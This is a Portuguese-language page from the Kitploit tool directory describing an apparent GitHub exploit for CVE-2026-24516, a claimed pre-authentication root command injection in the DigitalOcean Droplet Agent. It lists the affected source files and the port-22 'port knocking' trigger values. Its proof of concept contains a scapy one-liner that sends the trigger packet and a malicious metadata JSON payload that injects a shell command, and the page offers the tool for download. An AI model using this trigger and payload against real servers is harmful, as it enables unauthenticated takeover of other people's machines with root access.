Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24516-DigitalOcean-RCE — Vulnerabilidade Crítica de RCE Pré-Autenticação (CVSS 10.0) no DigitalOcean Droplet Agent até a v1.3.2 via Injeção de Comandos. | Kitploit
Ferramentas/GitHubGitHub/poxsky/cve-2026-24516-digitalocean-rce
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubpoxsky/cve-2026-24516-digitalocean-rce

CVE-2026-24516-DigitalOcean-RCE

Vulnerabilidade Crítica de RCE Pré-Autenticação (CVSS 10.0) no DigitalOcean Droplet Agent até a v1.3.2 via Injeção de Comandos.

Ver Repositório
1há 4 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-24516-DigitalOcean-RCE

RCE Crítico Pré-Autenticação como Root (CVSS 10.0) no DigitalOcean Droplet Agent até v1.3.2 via Injeção de Comandos.

CVE-2026-24516: RCE Pré-Autenticação como Root no DigitalOcean Droplet Agent

Visão Geral

Uma vulnerabilidade crítica de injeção de comandos foi descoberta no DigitalOcean Droplet Agent (todas as versões até e incluindo 1.3.2). Esta falha permite que um atacante alcance Execução Remota de Código (RCE) com privilégios de root sem qualquer autenticação.

Descobridor: Anmol Singh Rajput (@pox_sky_01) - Cortex Security Research

Detalhes Técnicos

A vulnerabilidade existe no componente de ação de resolução de problemas:

  • internal/troubleshooting/actioner/actioner.go
  • internal/troubleshooting/command/exec.go

O agente processa metadados do serviço local (169.254.169.254) e executa comandos do array sem sanitização adequada.

TroubleshootingAgent.Requesting

O Gatilho (Port Knocking)

O agente é acionado por um pacote TCP específico para a porta 22:

  • SeqNum: 68796879
  • AckNum: 848489

Prova de Conceito (PoC)

  1. Acionar a busca: python3 -c "from scapy.all import *; send(IP(dst='TARGET')/TCP(dport=22,flags='S',seq=68796879,ack=848489))"

  2. Payload de Metadados Maliciosos:

    root@kitploit:~
    {
      "troubleshooting_agent": {
        "requesting": ["command:id > /tmp/pwned"]
      }
    }
    

Impacto Pontuação CVSS: 10.0 (Crítico)

Privilégios Necessários: Nenhum

Resultado: Comprometimento Total do Sistema (Acesso Root)

photo_1_2026-03-22_13-46-01 photo_12_2026-03-22_13-46-01 photo_3_2026-03-22_13-46-01 photo_4_2026-03-22_13-46-01 photo_5_2026-03-22_13-46-01 photo_6_2026-03-22_13-46-01

Baixar ferramenta